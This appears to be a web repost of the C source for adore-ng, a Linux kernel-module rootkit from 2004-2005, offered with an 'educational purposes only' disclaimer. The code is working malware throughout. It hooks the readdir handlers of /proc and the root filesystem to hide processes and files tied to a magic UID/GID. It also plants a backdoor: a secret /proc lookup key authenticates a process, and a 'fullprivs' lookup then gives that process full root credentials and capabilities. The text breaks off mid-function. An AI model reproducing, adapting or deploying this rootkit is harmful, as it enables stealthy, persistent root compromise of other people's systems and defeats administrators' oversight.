adore-ng linux rootkit

/*** (C) 2004-2005 by Stealth *** *** http://stealth.scorpions.net/rootkits *** http://stealth.openwall.net/rootkits *** *** *** (C)'ed Under a BSDish license. Please look at LICENSE-file. *** SO YOU USE THIS AT YOUR OWN RISK! *** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS. *** !!! FOR EDUCATIONAL PURPOSES ONLY !!! *** *** -> Use ava to get all the things workin'. *** ***/ #define __KERNEL__ #define MODULE #ifdef MODVERSIONS #include <linux/modversions.h> #endif #include <linux/sched.h> #include <linux/kernel.h> #include <linux/module.h> #include <linux/string.h> #include <linux/fs.h> #include <linux/file.h> #include <linux/mount.h> #include <linux/proc_fs.h> #include <linux/capability.h> #include <linux/net.h> #include <linux/skbuff.h> #include <linux/spinlock.h> #include <net/sock.h> #include <linux/un.h> #include <net/af_unix.h> #include "adore-ng.h" char *proc_fs = "/proc"; /* default proc FS to hide processes */ MODULE_PARM(proc_fs, "s"); char *root_fs = "/"; /* default FS to hide files */ MODULE_PARM(root_fs, "s"); char *opt_fs = NULL; MODULE_PARM(opt_fs, "s"); typedef int (*readdir_t)(struct file *, void *, filldir_t); readdir_t orig_root_readdir = NULL, orig_opt_readdir = NULL, orig_proc_readdir = NULL; struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *) = NULL; int cleanup_module(); static int tcp_new_size(); static int (*o_get_info_tcp)(char *, char **, off_t, int); extern struct socket *sockfd_lookup(int fd, int *err); extern __inline__ void sockfd_put(struct socket *sock) { fput(sock->file); } #ifndef PID_MAX #define PID_MAX 0x8000 #endif static char hidden_procs[PID_MAX/8+1]; inline void hide_proc(pid_t x) { if (x >= PID_MAX || x == 1) return; hidden_procs[x/8] |= 1<<(x%8); } inline void unhide_proc(pid_t x) { if (x >= PID_MAX) return; hidden_procs[x/8] &= ~(1<<(x%8)); } inline char is_invisible(pid_t x) { if (x >= PID_MAX) return 0; return hidden_procs[x/8]&(1<<(x%8)); } /* Theres some crap after the PID-filename on proc * getdents() so the semantics of this function changed: * Make "672" -> 672 and * "672|@\" -> 672 too */ int adore_atoi(const char *str) { int ret = 0, mul = 1; const char *ptr; for (ptr = str; *ptr >= '0' && *ptr <= '9'; ptr++) ; ptr--; while (ptr >= str) { if (*ptr < '0' || *ptr > '9') break; ret += (*ptr - '0') * mul; mul *= 10; ptr--; } return ret; } /* Own implementation of find_task_by_pid() */ struct task_struct *adore_find_task(pid_t pid) { struct task_struct *p; read_lock(&tasklist_lock); // XXX: locking necessary? for_each_task(p) { if (p->pid == pid) { read_unlock(&tasklist_lock); return p; } } read_unlock(&tasklist_lock); return NULL; } int should_be_hidden(pid_t pid) { struct task_struct *p = NULL; if (is_invisible(pid)) { return 1; } p = adore_find_task(pid); if (!p) return 0; /* If the parent is hidden, we are hidden too XXX */ task_lock(p); #ifdef REDHAT9 if (is_invisible(p->parent->pid)) { #else if (is_invisible(p->p_pptr->pid)) { #endif task_unlock(p); hide_proc(pid); return 1; } task_unlock(p); return 0; } /* You can control adore-ng without ava too: * * echo > /proc/<ADORE_KEY> will make the shell authenticated, * cat /proc/hide-<PID> from such a shell will hide PID, * cat /proc/unhide-<PID> will unhide the process * cat /proc/uninstall will uninstall adore */ struct dentry *adore_lookup(struct inode *i, struct dentry *d) { task_lock(current); if (strncmp(ADORE_KEY, d->d_iname, strlen(ADORE_KEY)) == 0) { current->flags |= PF_AUTH; current->suid = ADORE_VERSION; } else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "fullprivs", 9) == 0) { current->uid = 0; current->suid = 0; current->euid = 0; current->gid = 0; current->egid = 0; current->fsuid = 0; current->fsgid = 0; cap_set_full(current->cap_effective); cap_set_full(current->cap_inheritable); cap_set_full(current->cap_permitted); } else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "hide-", 5) == 0) { hide_proc(adore_atoi(d->d_iname+5)); } else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "unhide-", 7) == 0) { unhide_proc(adore_atoi(d->d_iname+7)); } else if ((current->flags & PF_AUTH) && strncmp(d->d_iname, "uninstall", 9) == 0) { cleanup_module(); } task_unlock(current); if (should_be_hidden(adore_atoi(d->d_iname)) && /* A hidden ps must be able to see itself! */ !should_be_hidden(current->pid)) return NULL; return orig_proc_lookup(i, d); } filldir_t proc_filldir = NULL; spinlock_t proc_filldir_lock = SPIN_LOCK_UNLOCKED; int adore_proc_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x) { if (should_be_hidden(adore_atoi(name))) return 0; return proc_filldir(buf, name, nlen, off, ino, x); } int adore_proc_readdir(struct file *fp, void *buf, filldir_t filldir) { int r = 0; spin_lock(&proc_filldir_lock); proc_filldir = filldir; r = orig_proc_readdir(fp, buf, adore_proc_filldir); spin_unlock(&proc_filldir_lock); return r; } filldir_t opt_filldir = NULL; struct super_block *opt_sb[1024]; int adore_opt_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x) { struct inode *inode = NULL; int r = 0; uid_t uid; gid_t gid; if ((inode = iget(opt_sb[current->pid % 1024], ino)) == NULL) return 0; uid = inode->i_uid; gid = inode->i_gid; iput(inode); /* Is it hidden ? */ if (uid == ELITE_UID && gid == ELITE_GID) { r = 0; } else r = opt_filldir(buf, name, nlen, off, ino, x); return r; } int adore_opt_readdir(struct file *fp, void *buf, filldir_t filldir) { int r = 0; if (!fp || !fp->f_vfsmnt) return 0; opt_filldir = filldir; opt_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb; r = orig_opt_readdir(fp, buf, adore_opt_filldir); return r; } /* About the locking of these global vars: * I used to lock these via rwlocks but on SMP systems this can cause * a deadlock because the iget() locks an inode itself and I guess this * could cause a locking situation of AB BA. So, I do not lock root_sb and * root_filldir (same with opt_) anymore. root_filldir should anyway always * be the same (filldir64 or filldir, depending on the libc). The worst thing that * could happen is that 2 processes call filldir where the 2nd is replacing * root_sb which affects the 1st process which AT WORST CASE shows the hidden files. * Following conditions have to be met then: 1. SMP 2. 2 processes calling getdents() * on 2 different partitions with the same FS. * Now, since I made an array of super_blocks it must also be that the PIDs of * these procs have to be the same PID modulo 1024. This sitation (all 3 cases must * be met) should be very very rare. */ filldir_t root_filldir = NULL; struct super_block *root_sb[1024]; int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x) { struct inode *inode = NULL; int r = 0; uid_t uid; gid_t gid; if ((inode = iget(root_sb[current->pid % 1024], ino)) == NULL) return 0; uid = inode->i_uid; gid = inode->i_gid; iput(inode); /* Is it hidden ? */ if (uid == ELITE_UID && gid == ELITE_GID) { r = 0; } else r = root_filldir(buf, name, nlen, off, ino, x); return r; } int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir) { int r = 0; if (!fp || !fp->f_vfsmnt) return 0; root_filldir = filldir; root_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb; r = orig_root_readdir(fp, buf, adore_root_filldir); return r; } int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir) { struct file *filep; filep = filp_open(p, O_RDONLY, 0); if (IS_ERR(filep)) return -1; if (orig_readdir) *orig_readdir = filep->f_op->readdir; filep->f_op->readdir = new_readdir; filp_close(filep, 0); return 0; } int unpatch_vfs(const char *p, readdir_t orig_readdir)